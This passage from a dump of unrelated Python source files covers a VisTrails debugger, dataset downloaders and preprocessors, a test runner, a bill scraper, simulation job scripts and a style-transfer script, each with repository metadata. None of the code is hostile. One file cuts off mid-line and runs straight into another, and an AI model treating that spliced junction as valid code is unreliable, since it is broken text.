If the update requires querying modules for input\n changes, update_vals should be set to True\n \"\"\"\n self.inspector.clear_modules()\n if self.controller is not None:\n pipeline = self.controller.current_pipeline\n if pipeline is None:\n return\n\n for module in pipeline.module_list:\n if module.is_breakpoint or module.is_watched:\n self.inspector.add_module(module)\n if update_vals:\n (module_objects, _, _) = \\\n self.vistrails_interpreter.find_persistent_entities(\n pipeline)\n for m_id in self.inspector.modules:\n if (m_id in module_objects and \n module_objects[m_id] is not None):\n self.inspector.update_values(m_id, module_objects[m_id])\n elif module_objects[m_id] is None:\n edges = pipeline.graph.edges_to(m_id)\n self.inspector.update_inputs(m_id, module_objects, \n edges,\n pipeline.connections)\n\n def closeEvent(self, e):\n \"\"\"closeEvent(e) -> None\n Event handler called when the dialog is about to close.\"\"\"\n self.emit(QtCore.SIGNAL(\"debuggerHidden()\"))\n \n###############################################################################\n# QObjectInspector\n\nclass QObjectInspector(QtGui.QTreeWidget):\n \"\"\"\n This class provides the ability to track and inspect breakpoints added to a pipeline.\n It is meant to be embedded in the QDebugger object to allow debugging of workflows in\n VisTrails\n \"\"\"\n def __init__(self, parent=None):\n QtGui.QTreeWidget.__init__(self, parent)\n self.setColumnCount(2)\n self.modules = {}\n\n def clear_modules(self):\n \"\"\"\n clear_modules() -> None\n Clear the current list of module breakpoints\n \"\"\"\n self.modules = {}\n self.clear()\n \n def add_module(self, m):\n \"\"\"\n add_module(m : core.vistrail.module.Module) -> None\n Add the give module, m, as a breakpoint.\n \"\"\"\n # !!! 
This uses the core.vistrail.module.Module item\n item = QDebugModuleItem(self)\n item.setText(0, \"%s (%d)\" % (m.name, m.id))\n item.setText(1, \"Module Type\")\n self.modules[m.id] = item\n# self.add_dict(m, item)\n# self.add_ports(m, item, display_vals=get_vals)\n \n def update_values(self, m_id, persistent_module):\n \"\"\"\n update_values(m_id: long, \n persistent_module : subclass of core.modules.vistrails_module.Module)\n \"\"\"\n module_item = self.modules[m_id]\n module_item.takeChildren()\n self.add_dict(persistent_module, module_item)\n self.add_ports(persistent_module, module_item, True)\n\n def update_inputs(self, m_id, persistent_map, edges, connections):\n input_ports = {}\n for upstream_id, c_id in edges:\n if upstream_id in persistent_map and \\\n persistent_map[upstream_id] is not None:\n persistent_module = persistent_map[upstream_id]\n connection = connections[c_id]\n try:\n output_port = \\\n persistent_module.get_output(connection.source.name)\n input_ports[connection.destination.name] = output_port\n except ModuleError:\n input_ports[connection.destination.name] = None\n if len(input_ports) > 0:\n module_item = self.modules[m_id]\n module_item.takeChildren()\n inputs_item = QDebugModuleItem(module_item)\n inputs_item.setText(0, \"inputPorts\")\n inputs_item.setText(1, \"\") \n for port_name, port_val in input_ports.iteritems():\n self.create_port_item(port_name, port_val, True, \n inputs_item)\n \n def add_dict(self, m, parent_item):\n \"\"\"\n add_dict(m, parent_item) -> None\n Add the dictionary associated with module m to be displayed \n as part of the debug information for that breakpoint.\n \"\"\"\n dict_item = QDebugModuleItem(parent_item)\n dict_item.setText(0, \"__dict__\")\n dict_item.setText(1, \"\")\n for k in m.__dict__.keys():\n d_val = QDebugModuleItem(dict_item)\n d_val.setText(0, str(k))\n d_val.setText(1, str(m.__dict__[k]))\n\n\n def create_port_item(self, port_name, port_value, display_vals=False,\n parent=None):\n p_item = QDebugModuleItem(parent)\n p_item.setText(0, str(port_name))\n if display_vals:\n p_item.setText(1, str(port_value))\n else:\n typestr = str(port_value.__class__)\n typestr = typestr.split('.')\n typestr = typestr[len(typestr)-1]\n typestr = typestr[0:len(typestr)-2]\n p_item.setText(1, typestr) \n \n def add_ports(self, m, parent_item, display_vals=False):\n \"\"\"\n add_ports(m, item, display_vals=False) -> None\n Add port information from module m to the item being displayed in the debugger.\n If display_vals is True, fetch the appropriate values from the module's input ports.\n \"\"\"\n inputs_item = QDebugModuleItem(parent_item)\n inputs_item.setText(0, \"inputPorts\")\n inputs_item.setText(1, \"\")\n for port_name in m.inputPorts:\n try:\n port_val = m.get_input_list(port_name)\n if len(port_val) == 1:\n port_val = port_val[0]\n except ModuleError:\n port_val = None\n self.create_port_item(port_name, port_val, display_vals, \n inputs_item)\n outputs_item = QDebugModuleItem(parent_item)\n outputs_item.setText(0, \"outputPorts\")\n outputs_item.setText(1, \"\")\n for port_name in m.outputPorts:\n try:\n port_val = m.get_output(port_name)\n except ModuleError:\n port_val = None\n self.create_port_item(port_name, port_val, display_vals, \n outputs_item)\n\n########################################################################\n# QDebugModuleItem\n\nclass QDebugModuleItem(QtGui.QTreeWidgetItem):\n \"\"\"\n This class provides a unique container for adding breakpoints in a workflow\n to the debugger.\n \"\"\"\n def 
__init__(self, parent=None):\n QtGui.QTreeWidgetItem.__init__(self, parent)\n \n","repo_name":"VisTrails/VisTrails","sub_path":"vistrails/gui/debugger.py","file_name":"debugger.py","file_ext":"py","file_size_in_byte":8601,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"6"} +{"seq_id":"43524938621","text":"import json\nimport requests\n\n# reader for CoQA dataset\ndef read_coQA(file_path):\n with open(file_path, 'r') as f:\n data = json.load(f)\n return data\n\n# \"source\": \"mctest\",\n# \"id\": \"3dr23u6we5exclen4th8uq9rb42tel\",\n# \"filename\": \"mc160.test.41\",\ndef preprocess_coQA(data, save_path):\n preproc_data = []\n for item in data[\"data\"]:\n temp = {}\n temp['id'] = item['id']\n temp['source'] = item['source']\n temp['filename'] = item['filename']\n temp['meta'] = item['story']\n temp['dialogue'] = []\n temp['turn_id'] = []\n assert len(item['questions']) == len(item['answers'])\n for q,a in zip(item['questions'], item['answers']):\n assert q['turn_id'] == a['turn_id']\n temp['dialogue'].append([q['input_text'],a['input_text']])\n temp['turn_id'].append(q['turn_id'])\n preproc_data.append(temp)\n\n # save preprocessed data in json\n with open(save_path, 'w') as f:\n json.dump(preproc_data, f, indent=4) \n\ndef download_from_link(url, file_path):\n \n r = requests.get(url)\n with open(file_path, 'wb') as f:\n f.write(r.content)\n \n\nif __name__ == \"__main__\":\n # download CoQA dataset\n download_from_link('https://nlp.stanford.edu/data/coqa/coqa-train-v1.0.json', 'coqa-train-v1.0.json')\n download_from_link('https://nlp.stanford.edu/data/coqa/coqa-dev-v1.0.json', 'coqa-dev-v1.0.json')\n \n # # CoQA dataset\n data_path = 'coqa-dev-v1.0.json'\n save_path = 'valid.json'\n data = read_coQA(data_path)\n preprocess_coQA(data, save_path)\n\n data_path = 'coqa-train-v1.0.json'\n save_path = 'train.json'\n data = read_coQA(data_path)\n preprocess_coQA(data, save_path)","repo_name":"andreamad8/FSB","sub_path":"data/coQA/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"6"} +{"seq_id":"70407539388","text":"if __name__ == \"lib.chunkspb\":\n from lib.chunktypepb import ChunkType\nelse:\n from lib.chunktype import ChunkType\n\n# ChunkType(name, key, layout, *fields)\n\nNULL_CHUNK = ChunkType(\"NULL_CHUNK\", 0, \"\")\n\nID_FDSN = ChunkType(\"ID_FDSN\", 1, \"\", # unparsed\n \"data\")\n\nABS_TIME = ChunkType(\"ABS_TIME\", 2, \">> from ibeis.tests.run_tests import * # NOQA\n\n \"\"\"\n\n # DONT USE THESE FLAGS\n #print('--testall and --testslow give you more tests')\n # starts logging for tests\n import ibeis\n\n ibeis._preload()\n # Build module list and run tests\n import sys\n ensure_testing_data()\n if False:\n ut.change_term_title('RUN IBEIS TESTS')\n exclude_doctests_fnames = set([\n '_autogen_explicit_controller',\n 'template_definitions.py',\n 'autogen_test_script.py',\n ])\n exclude_dirs = [\n '_broken',\n 'old',\n 'tests',\n 'timeits',\n '_scripts',\n '_timeits',\n '_doc',\n 'notebook',\n ]\n if ut.in_pyinstaller_package():\n from os.path import dirname\n dpath_list = [dirname(ibeis.__file__)]\n # Run tests for installer\n doctest_modname_list_ = [\n 'ibeis.ibsfuncs',\n 'ibeis.viz.interact.interact_qres2',\n 'ibeis.viz.interact.interact_matches',\n 'ibeis.viz.interact.interact_annotations2',\n 'ibeis.viz.interact.interact_name',\n 'ibeis.viz.interact.interact_query_decision',\n 
'ibeis.viz.interact.interact_chip',\n 'ibeis.viz.interact.interact_qres',\n 'ibeis.algo.Config',\n 'ibeis.algo.hots._pipeline_helpers',\n 'ibeis.algo.hots.name_scoring',\n 'ibeis.algo.hots.devcases',\n 'ibeis.algo.hots.neighbor_index',\n 'ibeis.algo.hots.automated_helpers',\n 'ibeis.algo.hots.hots_query_result',\n 'ibeis.algo.hots.automated_oracle',\n 'ibeis.algo.hots.nn_weights',\n 'ibeis.algo.hots.pipeline',\n 'ibeis.algo.hots.automated_params',\n 'ibeis.algo.hots.vsone_pipeline',\n 'ibeis.algo.hots.automatch_suggestor',\n 'ibeis.algo.hots.score_normalization',\n 'ibeis.algo.hots.query_request',\n 'ibeis.algo.hots.chip_match',\n 'ibeis.algo.hots.multi_index',\n 'ibeis.algo.hots.qt_inc_automatch',\n 'ibeis.algo.hots.query_params',\n 'ibeis.algo.hots.precision_recall',\n 'ibeis.algo.hots.hstypes',\n 'ibeis.algo.hots.match_chips4',\n 'ibeis.algo.hots.distinctiveness_normalizer',\n 'ibeis.algo.hots.automated_matcher',\n 'ibeis.algo.hots.special_query',\n 'ibeis.algo.hots.scoring',\n 'ibeis.algo.preproc.preproc_annot',\n 'ibeis.algo.preproc.preproc_imageset',\n 'ibeis.algo.preproc.preproc_image',\n 'ibeis.algo.preproc.preproc_residual',\n 'ibeis.algo.detect.grabmodels',\n 'ibeis.control.manual_annot_funcs',\n 'ibeis.control.manual_chip_funcs',\n 'ibeis.control.manual_species_funcs',\n 'ibeis.control.manual_ibeiscontrol_funcs',\n 'ibeis.control._autogen_party_funcs',\n 'ibeis.control.manual_garelate_funcs',\n 'ibeis.control.manual_name_funcs',\n 'ibeis.control._sql_helpers',\n 'ibeis.control.manual_wildbook_funcs',\n 'ibeis.control.controller_inject',\n 'ibeis.control.manual_lblimage_funcs',\n 'ibeis.control.IBEISControl',\n 'ibeis.control._autogen_featweight_funcs',\n 'ibeis.control.manual_imageset_funcs',\n 'ibeis.control.manual_feat_funcs',\n 'ibeis.control.manual_gsgrelate_funcs',\n 'ibeis.control._autogen_annotmatch_funcs',\n 'ibeis.control.manual_meta_funcs',\n 'ibeis.control.manual_lblannot_funcs',\n 'ibeis.control.DB_SCHEMA',\n 'ibeis.control.manual_lbltype_funcs',\n 'ibeis.control.SQLDatabaseControl',\n 'ibeis.control.manual_image_funcs',\n 'ibeis.control.manual_annotgroup_funcs',\n 'ibeis.control.DBCACHE_SCHEMA',\n 'ibeis.init.main_helpers',\n 'ibeis.init.sysres',\n 'ibeis.gui.clock_offset_gui',\n 'ibeis.dbio.export_subset',\n 'ibeis.dbio.export_hsdb',\n 'ibeis.dbio.ingest_database',\n ]\n else:\n dpath_list = ['ibeis']\n doctest_modname_list_ = ut.find_doctestable_modnames(dpath_list, exclude_doctests_fnames, exclude_dirs)\n\n exclude_doctest_pattern = ut.get_argval(('--exclude-doctest-patterns', '--x'), type_=list, default=[])\n if exclude_doctest_pattern is not None:\n import re\n is_ok = [all([re.search(pat, name) is None for pat in exclude_doctest_pattern])\n for name in doctest_modname_list_]\n doctest_modname_list = ut.compress(doctest_modname_list_, is_ok)\n else:\n doctest_modname_list = doctest_modname_list_\n\n coverage = ut.get_argflag(('--coverage', '--cov',))\n if coverage:\n import coverage\n cov = coverage.Coverage(source=doctest_modname_list)\n cov.start()\n print('Starting coverage')\n\n exclude_lines = [\n 'pragma: no cover',\n 'def __repr__',\n 'if self.debug:',\n 'if settings.DEBUG',\n 'raise AssertionError',\n 'raise NotImplementedError',\n 'if 0:',\n 'if ut.VERBOSE',\n 'if _debug:',\n 'if __name__ == .__main__.:',\n 'print(.*)',\n ]\n for line in exclude_lines:\n cov.exclude(line)\n\n doctest_modname_list2 = []\n for modname in doctest_modname_list:\n try:\n exec('import ' + modname, globals(), locals())\n except ImportError as ex:\n ut.printex(ex, 
iswarning=True)\n if not ut.in_pyinstaller_package():\n raise\n else:\n doctest_modname_list2.append(modname)\n\n module_list = [sys.modules[name] for name in doctest_modname_list2]\n\n nPass, nTotal, failed_cmd_list = ut.doctest_module_list(module_list)\n\n if coverage:\n print('Stopping coverage')\n cov.stop()\n print('Saving coverage')\n cov.save()\n print('Generating coverage html report')\n cov.html_report()\n\n if nPass != nTotal:\n return 1\n else:\n return 0\n\nif __name__ == '__main__':\n \"\"\"\n python -m ibeis --run-tests\n \"\"\"\n import multiprocessing\n multiprocessing.freeze_support()\n run_tests()\n","repo_name":"smenon8/ibeis","sub_path":"ibeis/tests/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"6056983106","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport gzip\n\ndef falens(conn):\n lens = []\n curlen = 0\n for l in conn:\n l=l.decode(\"utf-8\").rstrip('\\n')\n if len(l) == 0:\n pass\n elif l[0] == \">\" and curlen > 0:\n lens.append(curlen)\n curlen = 0\n else:\n curlen += len(l)\n if curlen > 0:\n lens.append(curlen)\n curlen = 0\n return(lens)\n\ndef falens_allcl(conn):\n lens_allcl = {}\n cluster = \"\"\n curlen = 0\n for l in conn:\n l=l.decode(\"utf-8\").rstrip('\\n')\n if len(l) == 0:\n pass\n elif l[0] == \">\":\n if curlen > 0 and len(cluster) > 0:\n if not cluster in lens_allcl:\n lens_allcl[cluster] = []\n lens_allcl[cluster].append(curlen)\n curlen = 0\n cluster = l.rstrip('\\n').split()[1].split(':')[0]\n else:\n curlen += len(l)\n if curlen > 0 and len(cluster) > 0:\n if not cluster in lens_allcl:\n lens_allcl[cluster] = []\n lens_allcl[cluster].append(curlen)\n return(lens_allcl)\n\ndef plothist(origlens, finallens, opath, cl_mincount):\n if len(origlens) > cl_mincount and len(finallens) > 0:\n try:\n print(origlens)\n print(finallens)\n sns.distplot(origlens)\n for i in finallens:\n plt.axvline(i, 0, color=\"red\")\n plt.savefig(opath)\n plt.close()\n except np.linalg.LinAlgError:\n print(\"singular matrix:\", opath)\n pass\n\ndef plothist_allcl(origlens_allcl, finallens_allcl, opath_prefix, cl_mincount):\n for cluster, lens in finallens_allcl.items():\n plothist(origlens_allcl[cluster], lens, opath_prefix + \"_cluster_\" + str(cluster) + \"_test.pdf\", cl_mincount)\n\ndef main():\n paths = [x.rstrip('\\n') for x in sys.stdin]\n \n cl_mincount = int(sys.argv[1])\n clre = re.compile(r\"_clustered\")\n clre2 = re.compile(r\"_clustered.fa.gz\")\n paths_nocl = [clre.sub(\"_chosen\", path) for path in paths]\n opath_prefixes = [clre2.sub(\"\", path) for path in paths]\n \n for path, path_nocl, opath_prefix in zip(paths, paths_nocl, opath_prefixes):\n with gzip.open(path, \"r\") as conn:\n origlens_allcl = falens_allcl(conn)\n with gzip.open(path_nocl, \"r\") as conn:\n finallens_allcl = falens_allcl(conn)\n plothist_allcl(origlens_allcl, finallens_allcl, opath_prefix, cl_mincount)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jgbaldwinbrown/wavy_choose","sub_path":"testing/plot_tests.py","file_name":"plot_tests.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3139382094","text":"from app import db, BASE_DIR\nfrom app.models import *\n\nimport os\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nimport 
requests\nimport urllib.parse as urlparse\nimport re\nimport json\nimport codecs\nreader = codecs.getreader('utf-8')\n\ncongress_base_url = 'https://www.govtrack.us/data/congress/'\nactive_base_url = 'http://www.senate.gov/reference/active_bill_type/'\n\n\ndef url_in_db(url):\n if 'bills' in url or 'amendments' in url:\n query = db.session.query(Bill).filter_by(url=url).all()\n elif 'votes' in url:\n query = db.session.query(Bill).filter_by(url=url).all()\n return query != None\n \n\ndef url_to_json(url):\n try:\n datapage = requests.get(url)\n data = json.loads(datapage.text)\n except:\n print('***ERROR***',url)\n revisit = os.path.join(BASE_DIR,'data','revisit.txt')\n fo = open(revisit,'a')\n fo.write('%s\\n'%url)\n fo.close()\n return 0 \n return data\n\n\ndef save_directory(congress_id,subdir):\n save_dir = os.path.join(BASE_DIR,'data',subdir,\n congress_id)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n return save_dir\n\n\ndef add_to_json(json_data,**kwargs):\n data = {'raw':json_data}\n for key,value in kwargs.items():\n data[key] = value\n return data\n \ndef save_json_url(url,**kwargs):\n data = url_to_json(url)\n if not data:\n return None\n\n filename = save_json_filename(url,data)\n print('Downloading',url,'to',filename)\n\n json_to_save = add_to_json(data,**{'url':url,'active':False})\n json.dump(json_to_save,open(filename,'w'))\n return filename\n\ndef save_json_filename(url,data):\n congress_id = re.search('[0-9]{1,3}',url).group()\n doc = url.split('/')[-2]+'-'+congress_id+'-other'\n doc_id = data.get('bill_id',\n data.get('amendment_id',\n data.get('vote_id',\n doc)))\n\n if 'bills' in url:\n save_dir = save_directory(congress_id,'bills')\n elif 'votes' in url:\n save_dir = save_directory(congress_id,'sessions')\n elif 'amendments' in url:\n save_dir = save_directory(congress_id,'amendments')\n else:\n save_dir = save_directory(congress_id,'other')\n filename = os.path.join(save_dir,doc_id+'.json')\n\n return filename\n\ndef save_json(data,filename):\n json.dump(data,open(filename,'w'))\n return filename\n\ndef download_json_from_url(url):\n \"\"\"Recursively download data.json files starting from url\"\"\"\n if url.endswith('data.json'):\n print(url)\n save_json_url(url)\n return None\n elif url.endswith(('.xml','.txt')):\n return None\n else:\n try:\n page = requests.get(url)\n print(url)\n except:\n print('***ERROR***',url)\n revisit = os.path.join(BASE_DIR,'data','logs','revisit.txt')\n fo = open(revisit,'a')\n fo.write('%s\\n'%url)\n fo.close()\n return None\n soup = BeautifulSoup(page.text,'html.parser')\n links = [link for link in soup.find_all('a') \\\n if link.text not in ['../','text-versions/']]\n for link in links:\n visit_url = os.path.join(url,link.get('href'))\n download_json_from_url(visit_url)\n\n\ndef get_bill_type(bill_id):\n return re.findall('[a-z]+',bill_id)[0]\n\ndef get_bill_number(bill_id):\n return re.findall('[0-9]+',bill_id)[0]\n\ndef get_article_type(bill_id):\n if 'amdt' in bill_id:\n article_type='amendments'\n elif 'sa' in bill_id:\n article_type='amendments'\n bill_id = bill_id.replace('sa','samdt')\n else:\n article_type='bills'\n return article_type\n\ndef get_bill_url_from_bill_id(bill_id,congress_id):\n base = 'https://www.govtrack.us/data/congress/'\n article_type = get_article_type(bill_id)\n bill_type = get_bill_type(bill_id)\n if bill_type == 'sa':\n bill_id = bill_id.replace('sa','samdt')\n bill_type = 'samdt'\n base = os.path.join(base,str(congress_id),article_type,\n bill_type,bill_id,'data.json')\n return 
base\n\n\ndef download_from_congress(congress_id):\n url = os.path.join(congress_base_url,str(congress_id))\n print('Starting download from', url)\n download_json_from_url(url)\n return \n\ndef download_from_active_page(congress_id):\n url = 'http://www.senate.gov/reference/active_bill_type/%d.xml'%congress_id\n page = requests.get(url)\n root = ET.fromstring(page.text)\n assert congress_id == int(root.find('congress').text)\n years = list(map(int,root.find('years').text.split('-')))\n date_updated = root.find('date').text\n\n bills = get_active_senate_bills(root)\n filenames = []\n for name,bill_id in bills:\n url = get_bill_url_from_bill_id(bill_id,congress_id)\n data = url_to_json(url)\n filename = save_json_filename(url,data)\n json_to_save = add_to_json(data,**{'url':url,'active':True})\n save_json(json_to_save,filename)\n filenames.append(filename)\n return filenames\n\n\ndef get_active_senate_bills(xml_root):\n \"\"\"Returns short bill name and bill_id\"\"\"\n bills = []\n items = xml_root.findall('.//item')\n for item in items:\n name = item.find('name').text\n for child in item.getchildren():\n if child.tag in ['house','senate']:\n for article in child.getiterator():\n if article.tag == 'article':\n attrib = article.attrib\n noLink = attrib.get('noLink')=='yes'\n if article.text != None and not noLink:\n bill_id = article.text.lower().replace('.','')\n bills.append((name,bill_id))\n return bills\n","repo_name":"mike-a-yen/SeeYourSenate","sub_path":"app/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"42602752713","text":"#!/usr/bin/env python\nimport numpy as np\n\n# Params\ndisp_min = -0.25\ndisp_max = 0.25\ndisp_nbins = 500\ndirec = [1, 0, 0]\n\n# Main\ndx = (disp_max-disp_min) /disp_nbins\ndisp = np.array(range(disp_nbins+1)) /(disp_nbins) *(disp_max-disp_min) +disp_min\ndirec /= np.linalg.norm(direc)\nfrom ase.io import read, write\natoms = read('supercell_2x2x2_si-conv.traj')\n\nfrom os import environ as env\nenv['CUDA_VISIBLE_DEVICES'] = ''\nfrom subprocess import call\ncall('rm -rf calc-mlp/; mkdir calc-mlp', shell=True)\nfor i in range(len(disp)):\n folder = 'calc-mlp/{}_{}'.format(i, disp[i])\n call('mkdir {}'.format(folder), shell=True)\n new_atoms = atoms.copy()\n posi = new_atoms.get_positions()\n posi[0] += disp[i] *direc\n new_atoms.set_positions(posi)\n write('{}/POSCAR'.format(folder), new_atoms)\n call('lmp-pos2lmp.awk POSCAR > structure.in', shell=True, cwd=folder)\n call('cp frozen_model.pb input-md.in run.sh {}'.format(folder), shell=True)\n call('sh run.sh &', shell=True, cwd=folder)\n\n \n\n\n\n","repo_name":"hitergelei/tools","sub_path":"pes/calc-pes-mlp.py","file_name":"calc-pes-mlp.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11573164356","text":"import cv2\nimport numpy as np\nimport matplotlib.pylab as plt\nimport scipy.io as sio\nfrom scipy import misc\n\nimport config\nimport pyramid\nimport iris\nfrom utils import *\nfrom morph import morph\n\ndef style_transfer(style_in, im_in_name, style_ex, im_ex_name):\n im_in = im2double(bgr2rgb(cv2.imread(get_img_path(style_in, im_in_name))))\n im_ex = im2double(bgr2rgb(cv2.imread(get_img_path(style_ex, im_ex_name, True))))\n\n mask_in = im2double(bgr2rgb(cv2.imread(get_mask_path(style_in, im_in_name))))\n\n bgs_ex = 
im2double(bgr2rgb(cv2.imread(get_bgs_path(style_ex, im_ex_name))))\n\n data = sio.loadmat(config.second_mat_file)\n vx, vy = data['vx'], data['vy']\n vxm, vym = data['vxm'], data['vym']\n bin_alpha_in, bin_alpha_ex = data['bin_alpha_in'], data['bin_alpha_ex']\n\n vxf, vyf = thresh_v(vx + vxm, vy + vym)\n\n if config.debug:\n im_ex_wf, mask = warp_image(im_ex, vxf, vyf)\n plt.figure()\n plt.imshow(0.5 * (im_in + im_ex_wf))\n plt.show()\n\n im_in = mask_in * im_in + (1 - mask_in) * bgs_ex\n\n if config.debug:\n plt.figure()\n plt.imshow(im_in)\n plt.show()\n \n im_in = rgb2lab(im_in)\n im_ex = rgb2lab(im_ex)\n\n level = 6\n height, width, channels = im_in.shape\n im_out = np.zeros(im_in.shape)\n\n if config.recomp:\n for c in range(channels):\n pyr_in = pyramid.laplacian_pyramid(im_in[:, :, c], level, bin_alpha_in)\n pyr_ex = pyramid.laplacian_pyramid(im_ex[:, :, c], level, bin_alpha_ex)\n\n pyr_out = []\n for i in range(level - 1):\n r = 2**(i + 2)\n\n l_in = pyr_in[i]\n l_ex = pyr_ex[i]\n l_ex, _ = warp_image(l_ex, vxf, vyf)\n\n e_in = pyramid.imfilter(l_in ** 2, 6 * r - 1, r)\n e_ex = pyramid.imfilter(l_ex ** 2, 6 * r - 1, r)\n gain = (e_ex / (e_in + config.e_0)) ** 0.5\n\n for x in range(height):\n for y in range(width):\n gain[x, y] = max(min(gain[x, y], config.gain_max), config.gain_min)\n\n l_new = l_in * gain\n pyr_out.append(l_new)\n\n last, _ = warp_image(pyr_ex[level - 1], vxf, vyf)\n pyr_out.append(last)\n im_out[:, :, c] = pyramid.sum_pyramid(pyr_out)\n\n im_out = lab2rgb(im_out)\n im_in = lab2rgb(im_in)\n\n im_out = mask_in * im_out + (1 - mask_in) * bgs_ex\n sio.savemat(config.img_out_mat_file, {'im_out': im_out})\n else:\n im_out = sio.loadmat(config.img_out_mat_file)['im_out']\n\n if config.transfer_eye:\n alpha_l = im2double(bgr2rgb(cv2.imread(get_alpha_path(style_ex, True))))\n alpha_r = im2double(bgr2rgb(cv2.imread(get_alpha_path(style_ex, False))))\n\n fg_l = im2double(bgr2rgb(cv2.imread(get_fl_path(style_ex, True))))\n fg_r = im2double(bgr2rgb(cv2.imread(get_fl_path(style_ex, False))))\n\n model = load_model(style_in, im_in_name, True)\n leye_center = np.round(np.mean(model[36:42], 0))\n reye_center = np.round(np.mean(model[42:48], 0))\n\n half_width = 75\n half_height = 50\n\n leye_raw = im_in[int(leye_center[1]) - half_height - 1: int(leye_center[1]) + half_height,\n int(leye_center[0]) - half_width - 1: int(leye_center[0]) + half_width]\n reye_raw = im_in[int(reye_center[1]) - half_height - 1: int(reye_center[1]) + half_height,\n int(reye_center[0]) - half_width: int(reye_center[0]) + half_width]\n leye = im_out[int(leye_center[1]) - half_height - 1: int(leye_center[1]) + half_height,\n int(leye_center[0]) - half_width - 1: int(leye_center[0]) + half_width]\n reye = im_out[int(reye_center[1]) - half_height - 1: int(reye_center[1]) + half_height,\n int(reye_center[0]) - half_width: int(reye_center[0]) + half_width]\n \n leye_new = iris.eye_transfer(leye, leye_raw, alpha_l, fg_l)\n reye_new = iris.eye_transfer(reye, reye_raw, alpha_r, fg_r)\n\n im_out[int(leye_center[1]) - half_height - 1: int(leye_center[1]) + half_height,\n int(leye_center[0]) - half_width - 1: int(leye_center[0]) + half_width] = leye_new\n im_out[int(reye_center[1]) - half_height - 1: int(reye_center[1]) + half_height,\n int(reye_center[0]) - half_width: int(reye_center[0]) + half_width] = reye_new\n\n plt.figure()\n plt.imshow(im_out)\n plt.show()\n\n if config.save_output_img:\n misc.imsave(config.img_out_path, matrix2image(im_out))\n\nif __name__ == '__main__':\n style_transfer(config.style_in,\n 
config.im_in_name,\n config.style_ex,\n config.im_ex_name)","repo_name":"Els-y/style_transfer_headshot","sub_path":"second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"42489003371","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 17 16:03:56 2020\n\n@author: michal\n\"\"\"\n\nfrom graphManager import GraphManager\nfrom antechamberNode import AntechamberNode\nimport networkx as nx\nfrom os import getcwd\nfrom os.path import join\nimport sys\nfrom gaussianNode import GaussianNode\nfrom parsers import getGaussianInpFromSlurmFile\nfrom fitNode import FitNode\n\ndef generateGraph(slurmFile, template):\n jobGraph = nx.DiGraph()\n currentDir = getcwd()\n gaussianFile = getGaussianInpFromSlurmFile(slurmFile)\n \n newNode = GaussianNode(gaussianFile, currentDir)\n newNode.verification = \"Opt\"\n newNode.slurmFile = slurmFile\n newNode.autorestart = True\n jobGraph.add_node( currentDir , data = newNode )\n \n newDir = join(currentDir, \"gesp\")\n newNode = GaussianNode(\"auto_gesp.inp\", newDir)\n newNode.verification = \"SP\"\n \n newNode.routeSection = \"\"\"%Chk=checkp.chk\n%Mem=100GB\n#P B3LYP/6-31G(d,p)\n# Gfinput Pop=full Density Test iop(6/50=1)\n# Units(Ang,Deg) Pop=MK iop(6/33=2) iop(6/42=6)\n\"\"\"\n newNode.additionalSection = \"keto.gesp\\n\\nketo.gesp\\n\\n\"\n newNode.gesp = \"keto.gesp\"\n newNode.time = \"1:00:00\"\n newNode.partition = \"plgrid-short\"\n jobGraph.add_node(newDir, data = newNode)\n jobGraph.add_edge(currentDir, newDir)\n \n \n anteDir = join(newDir, \"antechamber\")\n newNode = AntechamberNode(\"keto.gesp\", anteDir)\n newNode.partition = \"plgrid-short\"\n jobGraph.add_node(anteDir, data = newNode)\n jobGraph.add_edge(newDir, anteDir)\n \n if template != None:\n fitDir = join(anteDir, \"fit\")\n newNode = FitNode(\"keto.mol2\", fitDir, template)\n newNode.partition = \"plgrid-short\"\n jobGraph.add_node(fitDir, data = newNode)\n jobGraph.add_edge(anteDir, fitDir)\n\n return jobGraph\n\nif __name__ == \"__main__\":\n if not len(sys.argv) in [ 2, 3 ] :\n print(\"ketoPrepare slurmFile, template[optional]\")\n else:\n sm = GraphManager()\n currentDir = getcwd()\n graph = sm.isGraphHere(currentDir)\n \n slurmFile = sys.argv[1]\n template = None\n if len(sys.argv) == 3:\n template = sys.argv[2]\n if not graph:\n newGraph = generateGraph(slurmFile, template)\n \n result = sm.addGraph(newGraph, currentDir)\n if result:\n sm.buildGraphDirectories(newGraph)\n sm.saveGraphs()\n print(\"Created new graph\")\n else:\n print(\"Cannot create more than one graph in the same directory\")","repo_name":"chemiczny/calculationFlow","sub_path":"ketoPrepare.py","file_name":"ketoPrepare.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"5182536684","text":"# Load Libraries\nfrom pandas import read_csv\nfrom seaborn import pairplot\nfrom matplotlib import pyplot\n\n# Load Dataset\nfile = \"YOUR FILEPATH\"\ncolumns = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\ndataset = read_csv(file,names = columns)\n\n# Print Information about Data\nprint(dataset.shape)\nprint(dataset.head(30))\nprint(dataset.describe())\nprint(dataset.groupby('class').size())\n\n# Box and Whisker plot\ndataset.plot(kind='box')\npyplot.show()\n\n# Histogram\ndataset.hist(bins = 